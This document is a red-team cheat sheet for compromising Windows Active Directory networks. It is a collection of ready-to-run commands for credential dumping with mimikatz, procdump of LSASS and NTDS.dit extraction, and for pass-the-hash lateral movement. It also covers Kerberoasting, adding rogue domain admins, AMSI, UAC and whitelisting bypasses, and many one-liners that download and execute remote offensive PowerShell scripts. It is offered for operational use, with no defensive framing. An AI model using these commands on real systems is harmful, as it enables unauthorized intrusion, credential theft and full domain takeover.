SharpHound.exe --CollectionMethod All

Run from remote shell

Useful when you have a remote shell.

powershell Set-ExecutionPolicy RemoteSigned

powershell -command "& { . C:\BloodHound.ps1; Invoke-BloodHound }"

Run from web server or over Internet:

Use this when you cannot copy BloodHound.ps1 over to target.

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1'); Invoke-BloodHound"

Run using Sharppick - AMSI bypass

SharpPick.exe -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1'); Invoke-BloodHound"

SharpPick-64.exe -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks"

Goddi (fast dump all domain info)

.\godditest-windows-amd64.exe -username=testuser -password="testpass!" -domain="test.local" -dc="dc.test.local" -unsafe

ADRecon (More detailed - Good for AD Auditing)

https://github.com/sense-of-security/ADRecon

Share and file finder

Invoke-ShareFinder -CheckShareAccess -Verbose -Threads 20 | Out-File -Encoding Ascii interesting-shares.txt

Invoke-FileFinder -ShareList .\interesting-shares.txt -Verbose -Threads 20 -OutFile juicy_files.csv

Eyewitness

docker run --rm -it -v /tmp/blah:/tmp/EyeWitness eyewitness --web --single https://www.google.com

Windows priv esc

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

Compromise and Lateral Movement

Crackmapexec

crackmapexec smb 172.16.110.0/24

crackmapexec smb 172.16.110.154 -u Administrator -p Password1 -x 'ipconfig'

crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --pass-pol

crackmapexec smb 172.16.110.154 -u Administrator -p Password1 -M mimikatz

crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --sam

crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --lsa

Winexe to boxes (not opsec safe) - service is run. No cleanup.

pth-winexe //10.0.0.1 -U DOMAIN/zdefense/blahuser%blahpassword cmd

pth-winexe //10.0.0.1 -U DOMAIN/zdefense/blahuser%hash cmd

Impacket psexec.py to boxes (not opsec safe) - does cleanup after but leaves logs after installing and running service.

psexec.py user@IP

psexec.py user@IP -hashes ntlm:hash

Impacket wmiexec.py (opsec safe - unless WMI logging is enabled)

wmiexec.py domain/user@IP

wmiexec.py domain/user@IP -hashes ntlm:hash

Impacket smbclient (probably opsec safe as its just using SMB)

python smbclient.py domain/blahuser@10.0.0.1 -hashes aad3b435b51404eeaad3b435b51404ee:blah

RDP Pass the Hash

Using mimikatz:

privilege::debug sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin"

If disabled:

sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:powershell.exe Enter-PSSession -Computer <Target> New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

Invoke the hash

Invoke-WMIExec -Target blah -Username blah -Hash NTLMHASH -Command blah

Password dumping

From Live Kali on a workstation

samdump2 SYSTEM SAM > hashes.txt

Local

C:\> reg.exe save hklm\sam c:\temp\sam.save

C:\> reg.exe save hklm\security c:\temp\security.save

C:\> reg.exe save hklm\system c:\temp\system.save

secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

pwdump system sam

In Memory

C:\> procdump.exe -accepteula -ma lsass.exe c:\lsass.dmp 2>&1

C:\> mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit

C:\>mini.exe

https://github.com/b4rtik/ATPMiniDump

From box

mimikatz # privilege::debug mimikatz # sekurlsa::logonPasswords full

Remote

impacket-secretsdump Administrator@ip impacket-secretsdump Administrator@ip -hashes ntlm:hash

Domain

To find where NTDS is run the below:

reg.exe query hklm\system\currentcontrolset\services\ntds\parameters

vssadmin

C:\vssadmin list shadows

C:\vssadmin create shadow /for=C:

copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .

copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .

copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .

secretsdump.py -system system.save -ntds ntds.dit local -just-dc-ntlm

remove machine accounts

grep -a -F ':::' hashes.txt | grep -av '$:' > finalhashes.txt

only passwords for pipal

cut -f 3 -d ':' cracked_with_users_enabled.txt

vssadmin delete shadows /shadow={cd534584-a272-44ab-81e1-ab3f5fbe9b29}

godumpsecrets for faster

ntdsutil

C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit

ntdsutil

ntdsutil: snapshot

ntdsutil: list all

ntdsutil: create

snapshot: mount 1

Cleanup snapshots:

snapshot: list all

snapshot: unmount 1

snapshot: list all

snapshot: delete 1

Post Compromise (Not opsec safe)

Add user to local admin and domain admin

Add Domain Admin

net user username password /ADD /DOMAIN

net group "Domain Admins" username /ADD /DOMAIN

Add Local Admin

net user username password /ADD

net localgroup Administrators username /ADD

Tasklist scraper to find logged in admins

If powershell not enabled or unable to run BloodHound this script will find admins.

#!/bin/sh

for ip in $(cat ip.txt);do

pth-winexe -U Admin%hash //$ip "ipconfig"

pth-winexe -U Admin%hash //$ip "tasklist /v"

done

Kerberoasting

Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat

https://raw.githubusercontent.com/xan7r/kerberoast/master/autokerberoast.ps1

Invoke-AutoKerberoast

python autoKirbi2hashcat.py ticketfilefromautoinvokekerberoast

IEX (New-Object Net.WebClient).DownloadString('https://github.com/EmpireProject/Empire/raw/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); Invoke-Kerberoast

Hashcat Alienware - kerbtgt hash cracking

sudo apt-get install nvidia-367

sudo nvidia-smi

reboot

sudo hashcat -I

hashcat -m 13100 kerb.txt ~/Downloads/realuniq.lst

LAPS - GetLAPSPasswords

https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1

Priv Esc

Powerup

IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellEmpire/PowerTools/raw/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks

File Transfer

SMB Server in Kali

python smbserver.py test /root/tools

Python Web Server

python -m SimpleHTTPServer <port>

Domain Fronting

https://blog.cobaltstrike.com/2017/02/06/high-reputation-redirectors-and-domain-fronting/ https://signal.org/blog/doodles-stickers-censorship/ https://www.securityartwork.es/2017/01/24/camouflage-at-encryption-layer-domain-fronting/ https://trac.torproject.org/projects/tor/wiki/doc/meek http://bryceboe.com/2012/03/12/bypassing-gogos-inflight-internet-authentication/

AWL bypasses

Powershell without powershell.exe

SharpPick.exe -d "http://zdefense/blah.ps1"

Squiblytwo

wmic.exe os get /format:"http://zdefense/foo.xsl"

Sharpshooter

https://www.mdsec.co.uk/2018/03/payload-generation-using-sharpshooter/

python SharpShooter.py --stageless --dotnetver 2 --payload js --output foo --rawscfile ./output/payload.bin --smuggle --template mcafee --com xslremote --awlurl http://ZDefense/foo.xsl

cypher queries

user to which box the user has localadmin

MATCH (u:User)-[r:MemberOf|:AdminTo*1..]->(c:Computer) return u.name, collect(c.name)

List of DAs Match p=(u:User)-[:MemberOf]->(g:Group) WHERE g.name= "DOMAIN ADMINS@ZDefense" return u.displayname

https://downloads.skullsecurity.org/dnscat2/
https://github.com/lukebaggett/dnscat2-powershell
$ dnscat –host <dnscat server_ip>

Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

Invoke-Mimikatz: Dump credentials from memory

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

Import Mimikatz Module to run further commands

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"

Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

PowerUp: Privilege escalation checks

powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks”

Invoke-Inveigh and log output to file

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"

Invoke-Kerberoast and provide Hashcat compatible hashes

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"

Invoke-ShareFinder and print output to file

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

Import PowerView Module to run further commands

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

Invoke-Bloodhound

powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

Find GPP Passwords in SYSVOL

findstr /S cpassword $env:logonserver\sysvol*.xml findstr /S cpassword %logonserver%\sysvol*.xml (cmd.exe)

Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]

runas /user:DOMAIN\USER /noprofile powershell.exe

Insert reg key to enable Wdigest on newer versions of Windows

reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1